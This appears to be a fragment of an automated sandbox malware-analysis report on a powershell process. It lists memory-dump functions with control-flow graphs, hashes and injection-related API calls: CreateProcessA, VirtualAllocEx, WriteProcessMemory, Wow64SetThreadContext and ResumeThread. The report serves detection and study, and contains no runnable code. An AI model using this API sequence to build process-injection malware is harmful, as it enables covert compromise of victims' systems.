797048b-7970491 188->191 192 7970495-7970497 191->192 193 7970493 191->193 192->190 193->190
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                  • API String ID: 0-2353078639
                                                  • Opcode ID: 15a8fd3cde776de1ed434dbebdd549decd916a3c546970d5f338a818d28431b3
                                                  • Instruction ID: d5c84f14631aa2f6f441b72d40732cd6049da9207728f37667e4f8a367a6a5be
                                                  • Opcode Fuzzy Hash: 15a8fd3cde776de1ed434dbebdd549decd916a3c546970d5f338a818d28431b3
                                                  • Instruction Fuzzy Hash: A64126F17182068FDB284A3D95223BAB7D9AF8121CF248876C851CB395FF76C945C3A1
                                                  Function 079707E7 Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 195 79707e7-79707ff 197 7970806-7970808 195->197 198 7970820-7970877 197->198 199 797080a-7970810 197->199 201 7970814-7970816 199->201 202 7970812 199->202 201->198 202->198
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 7edf42907ce07ff11f0646c71eba61fcc7a57a7655f07b773d07a05194691550
                                                  • Instruction ID: 2ad65649b1ccc10c09ab9cf60ad9a44819611a0a7b1dac4090319d4c14afb07d
                                                  • Opcode Fuzzy Hash: 7edf42907ce07ff11f0646c71eba61fcc7a57a7655f07b773d07a05194691550
                                                  • Instruction Fuzzy Hash: 43E0D871B0424D8EDF285BAC95602E97BA5FF82514F11489AC491C7156D7368805C7E2
                                                  Function 07131B9D Relevance: 1.8, APIs: 1, Instructions: 341processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 203 7131b9d-7131c41 205 7131c43-7131c5a 203->205 206 7131c8a-7131cb2 203->206 205->206 211 7131c5c-7131c61 205->211 209 7131cb4-7131cc8 206->209 210 7131cf8-7131d4e 206->210 209->210 220 7131cca-7131ccf 209->220 218 7131d50-7131d64 210->218 219 7131d94-7131e8a CreateProcessA 210->219 212 7131c63-7131c6d 211->212 213 7131c84-7131c87 211->213 215 7131c71-7131c80 212->215 216 7131c6f 212->216 213->206 215->215 221 7131c82 215->221 216->215 218->219 228 7131d66-7131d6b 218->228 239 7131e93-7131f5c 219->239 240 7131e8c-7131e92 219->240 222 7131cf2-7131cf5 220->222 223 7131cd1-7131cdb 220->223 221->213 222->210 225 7131cdf-7131cee 223->225 226 7131cdd 223->226 225->225 229 7131cf0 225->229 226->225 230 7131d8e-7131d91 228->230 231 7131d6d-7131d77 228->231 229->222 230->219 233 7131d7b-7131d8a 231->233 234 7131d79 231->234 233->233 235 7131d8c 233->235 234->233 235->230 250 7131f78-7131f79 239->250 240->239 251 7131f53-7131f5c 250->251 252 7131f7b-7131f7c 250->252 251->250 253 7131f7e-7131f82 252->253 254 7131f8c-7131f90 252->254 253->254 255 7131f84 253->255 256 7131f92-7131f96 254->256 257 7131fa0-7131fa4 254->257 255->254 256->257 258 7131f98 256->258 259 7131fa6-7131faa 257->259 260 7131fb4-7131fb8 257->260 258->257 259->260 261 7131fac 259->261 262 7131fba-7131fe3 260->262 263 7131fee-7131ff9 260->263 261->260 262->263 267 7131ffa 263->267 267->267
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07131E77
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 0525940994abd9bdc5e03a8b91a77b0be98d41e3d9d551bee45418b6e6fea804
                                                  • Instruction ID: eb5a513c60c51a184337293510763bef972d014884a63de9ca9e17528457b272
                                                  • Opcode Fuzzy Hash: 0525940994abd9bdc5e03a8b91a77b0be98d41e3d9d551bee45418b6e6fea804
                                                  • Instruction Fuzzy Hash: 3AC126B1D0062D9FDB25CFA8C844BEDBBB1BF49304F0091A9D859B7290DB749A85DF81
                                                  Function 07131BA8 Relevance: 1.8, APIs: 1, Instructions: 337processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 268 7131ba8-7131c41 270 7131c43-7131c5a 268->270 271 7131c8a-7131cb2 268->271 270->271 276 7131c5c-7131c61 270->276 274 7131cb4-7131cc8 271->274 275 7131cf8-7131d4e 271->275 274->275 285 7131cca-7131ccf 274->285 283 7131d50-7131d64 275->283 284 7131d94-7131e8a CreateProcessA 275->284 277 7131c63-7131c6d 276->277 278 7131c84-7131c87 276->278 280 7131c71-7131c80 277->280 281 7131c6f 277->281 278->271 280->280 286 7131c82 280->286 281->280 283->284 293 7131d66-7131d6b 283->293 304 7131e93-7131f5c 284->304 305 7131e8c-7131e92 284->305 287 7131cf2-7131cf5 285->287 288 7131cd1-7131cdb 285->288 286->278 287->275 290 7131cdf-7131cee 288->290 291 7131cdd 288->291 290->290 294 7131cf0 290->294 291->290 295 7131d8e-7131d91 293->295 296 7131d6d-7131d77 293->296 294->287 295->284 298 7131d7b-7131d8a 296->298 299 7131d79 296->299 298->298 300 7131d8c 298->300 299->298 300->295 315 7131f78-7131f79 304->315 305->304 316 7131f53-7131f5c 315->316 317 7131f7b-7131f7c 315->317 316->315 318 7131f7e-7131f82 317->318 319 7131f8c-7131f90 317->319 318->319 320 7131f84 318->320 321 7131f92-7131f96 319->321 322 7131fa0-7131fa4 319->322 320->319 321->322 323 7131f98 321->323 324 7131fa6-7131faa 322->324 325 7131fb4-7131fb8 322->325 323->322 324->325 326 7131fac 324->326 327 7131fba-7131fe3 325->327 328 7131fee-7131ff9 325->328 326->325 327->328 332 7131ffa 328->332 332->332
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07131E77
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 694a235a92ad6d211bc3cd3509bbc7daa91febecb3070223b0524ccfea8cf3a5
                                                  • Instruction ID: c81e935c136c1885cde5bd0a8ce7c046f9b0f47097c20facf8a53a8823463fe0
                                                  • Opcode Fuzzy Hash: 694a235a92ad6d211bc3cd3509bbc7daa91febecb3070223b0524ccfea8cf3a5
                                                  • Instruction Fuzzy Hash: F0C136B1D0062D9FDB25CFA8C844BEDBBB1BF49304F0091A9D859B7290DB749A85DF81
                                                  Function 0713181B Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 333 713181b-713188b 335 71318a2-7131903 WriteProcessMemory 333->335 336 713188d-713189f 333->336 338 7131905-713190b 335->338 339 713190c-713195e 335->339 336->335 338->339
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 071318F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 7b344382f03a8a537e57607b5de31386e1e1a33f674024f05b13a0b0a3aed671
                                                  • Instruction ID: 2529930236f2f6355a9ce4a191f73306ea770dd35633c8202bbd47ee7cdd9815
                                                  • Opcode Fuzzy Hash: 7b344382f03a8a537e57607b5de31386e1e1a33f674024f05b13a0b0a3aed671
                                                  • Instruction Fuzzy Hash: 674198B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE419B7250C739AA45CB64
                                                  Function 07131820 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 344 7131820-713188b 346 71318a2-7131903 WriteProcessMemory 344->346 347 713188d-713189f 344->347 349 7131905-713190b 346->349 350 713190c-713195e 346->350 347->346 349->350
                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 071318F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 9d610c73fd3ee03e1c106dcae52a470078388d325adc4da65b578b2d75014163
                                                  • Instruction ID: bcda48cb1481807a12f5fb8090fbebd333961ce1b2a9f04f4768107dfb2a2b39
                                                  • Opcode Fuzzy Hash: 9d610c73fd3ee03e1c106dcae52a470078388d325adc4da65b578b2d75014163
                                                  • Instruction Fuzzy Hash: 4E419AB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE419B7250D738AA45CF64
                                                  Function 07131700 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 377 7131700-71317ba VirtualAllocEx 380 71317c3-713180d 377->380 381 71317bc-71317c2 377->381 381->380
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071317AA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 46fa0a58cd47abafd81d2eaa1112cc7ccc26e2481dae1038d1dd39f0782c6454
                                                  • Instruction ID: b2b9a44de0d9618feb3c14ab5261e3953ced2470e3a7a9271c77fb097240eb8e
                                                  • Opcode Fuzzy Hash: 46fa0a58cd47abafd81d2eaa1112cc7ccc26e2481dae1038d1dd39f0782c6454
                                                  • Instruction Fuzzy Hash: AC31A8B9D00258AFCF10CFA9D980ADEFBB1FB49310F14942AE815B7210D735A946CFA4
                                                  Function 071315D0 Relevance: 1.6, APIs: 1, Instructions: 101threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 355 71315d0-7131638 358 713163a-713164c 355->358 359 713164f-7131697 Wow64SetThreadContext 355->359 358->359 361 71316a0-71316ec 359->361 362 7131699-713169f 359->362 362->361
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 07131687
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 9589a6192f83d2793afbbe9fab636057a0d196699ca71082a11bec912682b419
                                                  • Instruction ID: 9c461b941a44f5020abc472d6bfd4b977bbcb36ff3c9e418c0dcfeeb4c389bcc
                                                  • Opcode Fuzzy Hash: 9589a6192f83d2793afbbe9fab636057a0d196699ca71082a11bec912682b419
                                                  • Instruction Fuzzy Hash: 5041C0B5D012189FCB10DFAAD584AEEFBF1BF49310F14802AE415B7240C778A985CF94
                                                  Function 071316FB Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 367 71316fb-71317ba VirtualAllocEx 371 71317c3-713180d 367->371 372 71317bc-71317c2 367->372 372->371
                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071317AA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 3e50640f8716763be30af25c98332dfb2ea54004ac2abac1506d2c4879c15e36
                                                  • Instruction ID: 5042c6e3d625619137b360e0c26ad216b8bd2f17efcee4acaf0eed297e8f67a8
                                                  • Opcode Fuzzy Hash: 3e50640f8716763be30af25c98332dfb2ea54004ac2abac1506d2c4879c15e36
                                                  • Instruction Fuzzy Hash: DD3176B9D00258AFCF10CFA9D980ADEFBB1BB59310F14942AE815B7250D735A946CFA4
                                                  Function 071315D8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 386 71315d8-7131638 388 713163a-713164c 386->388 389 713164f-7131697 Wow64SetThreadContext 386->389 388->389 391 71316a0-71316ec 389->391 392 7131699-713169f 389->392 392->391
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 07131687
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 695b23945b1ff514ce2fa00d46fd4eb015638dde7ff639f7864066873f4a9653
                                                  • Instruction ID: fc21d900997158d16ccde8dc175b6eab7c526769d7df803395bfe31e69a9331f
                                                  • Opcode Fuzzy Hash: 695b23945b1ff514ce2fa00d46fd4eb015638dde7ff639f7864066873f4a9653
                                                  • Instruction Fuzzy Hash: 9531CDB5D012589FCB14DFAAD984AEEFBF5BF49310F14802AE419B7240C778A985CF94
                                                  Function 071301B1 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 397 71301b1-7130246 ResumeThread 401 7130248-713024e 397->401 402 713024f-7130291 397->402 401->402
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: f73ddad8f54fd124ba7373dd84004a5d0d3346949ca938ae8a16cb5d9456607d
                                                  • Instruction ID: 56ff8a1cb3b437ec676ee806c06c5fd91f9dc23d1cd0cebe9f6ca1ad7a503c39
                                                  • Opcode Fuzzy Hash: f73ddad8f54fd124ba7373dd84004a5d0d3346949ca938ae8a16cb5d9456607d
                                                  • Instruction Fuzzy Hash: C831BEB5D012189FCF14CFA9D585AEEFBB5AF49310F10942AE419B7250C735A841CFA4
                                                  Function 071301B8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 408 71301b8-7130246 ResumeThread 411 7130248-713024e 408->411 412 713024f-7130291 408->412 411->412
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2281027888.0000000007130000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7130000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 595af0a4b1aecb5d7f6aebde13c1c442c73eaae2cc0ad72bd401a541883eaffd
                                                  • Instruction ID: 27c65b444d7fb0e7ccef21929a59bd9b553c7f3961d476222922ea6f83551dac
                                                  • Opcode Fuzzy Hash: 595af0a4b1aecb5d7f6aebde13c1c442c73eaae2cc0ad72bd401a541883eaffd
                                                  • Instruction Fuzzy Hash: A831A9B4D012189FCF14CFAAD984AAEFBF5AF49310F14942AE819B7250C735A941CFA4
                                                  Function 07971EC2 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q
                                                  • API String ID: 0-2175968468
                                                  • Opcode ID: 61dc6a8688bef4a88ce742030fcbe040f4bc3189611e679d8c84f171cb601248
                                                  • Instruction ID: 985f03d826784ca0464e6f027b48d96a9757b3a4abe9db150de247fc9080f687
                                                  • Opcode Fuzzy Hash: 61dc6a8688bef4a88ce742030fcbe040f4bc3189611e679d8c84f171cb601248
                                                  • Instruction Fuzzy Hash: FA415671649385AFC7128B54C892AA9BFB1EFC6314F19849BD584CF292C7329C46C7B2
                                                  Function 04AE4710 Relevance: .5, Instructions: 522COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b5300edc835f950092f18f6f8a20d295d97b714eea07838feedb1bb2f2988fa
                                                  • Instruction ID: bcf413fed98ffa27a47da210cbd495780b913560e7fedcff4315d2707d6177b7
                                                  • Opcode Fuzzy Hash: 1b5300edc835f950092f18f6f8a20d295d97b714eea07838feedb1bb2f2988fa
                                                  • Instruction Fuzzy Hash: DA228F74A012489FCB05CFA9C494AAEFFB5FF89310F15819AE455AB365C735EC81CB90
                                                  Function 04AE3E28 Relevance: .4, Instructions: 442COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff3adbce6842f063ae7c5bee99aa52e259ba432bb938c202a8d8863e714921fb
                                                  • Instruction ID: e69984cc9d298897720569da4541621ddecf658fe10abd650e9c0055f7f79fe7
                                                  • Opcode Fuzzy Hash: ff3adbce6842f063ae7c5bee99aa52e259ba432bb938c202a8d8863e714921fb
                                                  • Instruction Fuzzy Hash: 97029F30A052589FCB05DFA9D8909AEBFF2FF89310F158596E854AB362C735EC45CB90
                                                  Function 04AE36D0 Relevance: .2, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16897f8631277dca13d1ed166208faa08c6180cacd5b6ef0a3c839e254de5b90
                                                  • Instruction ID: 1c0974977f908824ee997a2bc9d2ab188c2cccd01840c198bdc7088cbdcb33a8
                                                  • Opcode Fuzzy Hash: 16897f8631277dca13d1ed166208faa08c6180cacd5b6ef0a3c839e254de5b90
                                                  • Instruction Fuzzy Hash: B8B10674A00218AFDB14CFA9D594AADFBF2BF88310F24C159E815AB355C735ED86CB90
                                                  Function 04AE3DA3 Relevance: .2, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a8475a2b999a65e869cd6918f5b500e0d5ea8a1b3e2e76c6099f3fb72d58b68
                                                  • Instruction ID: b9db2296be60033503c7e92bace9620b165703572128553baa2d0cd7a5e0af79
                                                  • Opcode Fuzzy Hash: 8a8475a2b999a65e869cd6918f5b500e0d5ea8a1b3e2e76c6099f3fb72d58b68
                                                  • Instruction Fuzzy Hash: DD51C2319093944FCB06DF6DC8A08EABFF1AF4A32471946D7D890DB2A3D224EC45C7A5
                                                  Function 04AE3640 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0394dea9e6bf9ba6aa4c8e61297d1b3d059b5159137257fe85759cc350b1c7b1
                                                  • Instruction ID: bce7ff83f156a3086732c2bcaae3f7e94c98e7e987124def11e1685fec81a6fa
                                                  • Opcode Fuzzy Hash: 0394dea9e6bf9ba6aa4c8e61297d1b3d059b5159137257fe85759cc350b1c7b1
                                                  • Instruction Fuzzy Hash: 365158B5A04254AFCB04CFA9D5849ADFBF1FF88310F15855AE858AB312D731ED81CB91
                                                  Function 04AE4B88 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35d0bb2890a332409adafaa30087991bd2ed5cac27fded4ae702da86d323413f
                                                  • Instruction ID: ffc9ba43ce92dc0e3ad07a12d2b20343bc5eb7bd937a4734c78cde9614920225
                                                  • Opcode Fuzzy Hash: 35d0bb2890a332409adafaa30087991bd2ed5cac27fded4ae702da86d323413f
                                                  • Instruction Fuzzy Hash: 8D411874A00509DFCB05CF5AC5949BAFBB5FF88310B158699D515AB364C732FC90CBA0
                                                  Function 04AE38DF Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b4269814fcd1487f1e35d24f22d3291649b4996755a5b1fcca760802ef40fc0
                                                  • Instruction ID: a6feea28d5d79cbfe7b67bfa31046ce629beb2915963ab7beb757f2a80d03215
                                                  • Opcode Fuzzy Hash: 0b4269814fcd1487f1e35d24f22d3291649b4996755a5b1fcca760802ef40fc0
                                                  • Instruction Fuzzy Hash: 86410B34A00209EFDB04CFA9D494AADFBF2BF88310F248555E815AB365C735EC86CB90
                                                  Function 04AE39CB Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6c656b75fe9388f14d4c0fc8ec5609e10c0447590b3682fc7f193c145b971da
                                                  • Instruction ID: fb56834fd5b882bcca31eaf3f732d9663154d9aca774e52453a077433059248b
                                                  • Opcode Fuzzy Hash: c6c656b75fe9388f14d4c0fc8ec5609e10c0447590b3682fc7f193c145b971da
                                                  • Instruction Fuzzy Hash: 27111930A04208AFCB05CBA8D494AADFBF5AF88300F24C555E815AB361C775ED86CB90
                                                  Function 0318D01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2254499195.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_318d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ee9a2d4dda0c1822824e1377c7d53e2e82fa48b4f3fc2e8196a04962a0e9ff5
                                                  • Instruction ID: fd2574aedf7e8f0c3705231bec40d09af0a196071d1e1577cae0db0979355939
                                                  • Opcode Fuzzy Hash: 2ee9a2d4dda0c1822824e1377c7d53e2e82fa48b4f3fc2e8196a04962a0e9ff5
                                                  • Instruction Fuzzy Hash: D301D4314043449BD720EB15ED84B67BF9CEF49324F18C469ED480A286C7799841CEB9
                                                  Function 0318D007 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2254499195.000000000318D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0318D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_318d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88a605e2aec9583e9491935e45b81f328c7ca19defa64faabcc3a935572a64db
                                                  • Instruction ID: aefe89704811aa812f0f6abfd738a32d6205d5e496830f2aaba3409b67b1f984
                                                  • Opcode Fuzzy Hash: 88a605e2aec9583e9491935e45b81f328c7ca19defa64faabcc3a935572a64db
                                                  • Instruction Fuzzy Hash: B001407140E3C49FD7128B259C94B52BFB8EF57224F1D80DBD9888F2A7C2699844CB76
                                                  Function 04AEF0DF Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2255823434.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af1cbe016bd542b93da532b7a5199c7624233c105b4ce132edd3b8974ccb7b3b
                                                  • Instruction ID: 8d3cc7862c1bc5ccc0a5235ff7f0b09999155629a7241d6e875e8340bb62e8bb
                                                  • Opcode Fuzzy Hash: af1cbe016bd542b93da532b7a5199c7624233c105b4ce132edd3b8974ccb7b3b
                                                  • Instruction Fuzzy Hash: 6CF01C70E02208EFCB45DFA9D5412DDBBF0FF44305F5080AAD82896641E73A5951DF81

                                                  Non-executed Functions

                                                  Function 07970080 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2283191494.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q
                                                  • API String ID: 0-978391646
                                                  • Opcode ID: ad12947ee3a7b83f154a5ec8db1dadfe0cbfe5a26d96d4b8870eba8d4560e9fb
                                                  • Instruction ID: 10ac2a9d4b30e7ad880505083932bae0961ebb8d05ebf5fb6cc9f94a7fb8ad85
                                                  • Opcode Fuzzy Hash: ad12947ee3a7b83f154a5ec8db1dadfe0cbfe5a26d96d4b8870eba8d4560e9fb
